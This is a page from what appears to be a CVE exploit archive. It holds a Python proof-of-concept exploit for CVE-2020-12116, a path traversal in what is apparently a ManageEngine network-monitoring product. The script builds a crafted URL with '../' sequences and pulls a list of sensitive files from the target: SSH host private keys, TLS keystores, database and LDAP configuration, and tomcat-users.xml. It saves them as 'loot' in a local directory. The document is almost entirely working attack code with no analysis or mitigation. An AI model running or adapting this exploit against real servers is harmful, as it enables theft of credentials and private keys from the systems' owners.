4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-12116
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import os
import argparse
import urllib.error

from urllib.request import urlopen
from random import randint

def save_to_file(data, dest_file):
	with open(dest_file, "wb") as file_out:
		file_out.write(data)

def exploit(host, port, target_file, ssl=False):
	uri  = f"/cachestart/{randint(1,6)}/cacheend/apiclient"
	uri += f"/fluidicv2/javascript/jquery/../../../../{target_file}"

	port = str(int(port))

	if ssl == True:
		if port == "443":
			base_url = f"https://{host}"
		else:
			base_url = f"https://{host}:{port}"

	elif ssl == False:
		if port == "80":
			base_url = f"http://{host}"
		else:
			base_url = f"http://{host}:{port}"

	url = f"{base_url}{uri}"

	resp = urlopen(url)
	data = resp.read()

	return data

def main():
	parser = argparse.ArgumentParser()

	parser.add_argument('-t', action="store", dest="target",
		default=None, help="Target IP or hostname to exploit")

	parser.add_argument('-p', action="store", dest="port",
		type=int, default=8060, help="Remote port of the target")
	
	parser.add_argument('-d', action="store", dest="loot_dir",
		default="./", help="Directory to store loot")
	
	parser.add_argument('-s', action='store_true', dest="arg_ssl",
		default=False, help="Target uses SSL")

	args = parser.parse_args()

	if args.target == None:
		print("Error: You must specify the target host with the '-t' flag")
		os._exit(1)

	target_files = [
		"bin/.ssh_host_dsa_key",
		"bin/.ssh_host_dsa_key.pub",
		"bin/.ssh_host_rsa_key",
		"bin/.ssh_host_rsa_key.pub",
		"conf/client.keystore",
		"conf/customer-config.xml",
		"conf/database_params.conf",
		"conf/FirewallAnalyzer/aaa_auth-conf.xml",
		"conf/FirewallAnalyzer/auth-conf_ppm.xml",
		"conf/gateway.conf",
		"conf/itom.truststore",
		"conf/netflow/auth-conf.xml",
		"conf/netflow/server.xml",
		"conf/netflow/ssl_server.xml",
		"conf/NFAEE/cs_server.xml",
		"conf/OpManager/database_params.conf",
		"conf/OpManager/database_params_DE.conf",
		"conf/OpManager/ldap.conf",
		"conf/OpManager/MicrosoftSQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params_DE.conf",
		"conf/OpManager/securitydbData.xml",
		"conf/OpManager/SnmpDefaultProperties.xml",
		"conf/Oputils/snmp/Community.xml",
		"conf/Persistence/DBconfig.xml",
		"conf/Persistence/persistence-configurations.xml",
		"conf/pmp/PMP_API.conf",
		"conf/pmp/pmp_server_cert.p12",
		"conf/product-config.xml",
		"conf/SANSeed.xml",
		"conf/server.keystore",
		"conf/server.xml",
		"conf/system_properties.conf",
		"conf/tomcat-users.xml",
		"lib/OPM_APNS_Cert.p12"
	]
	
	for file in target_files:
		try:
			data = exploit(args.target, args.port, file, ssl=False)
		
		except urllib.error.HTTPError as e:
			print(f"[-] {file} - {str(e)}")
			continue

		dest = args.loot_dir + file.replace('/', '|').strip()
		save_to_file(data, dest)

		print(f"[+] {file} saved to {dest}")

if __name__ == '__main__':
	main()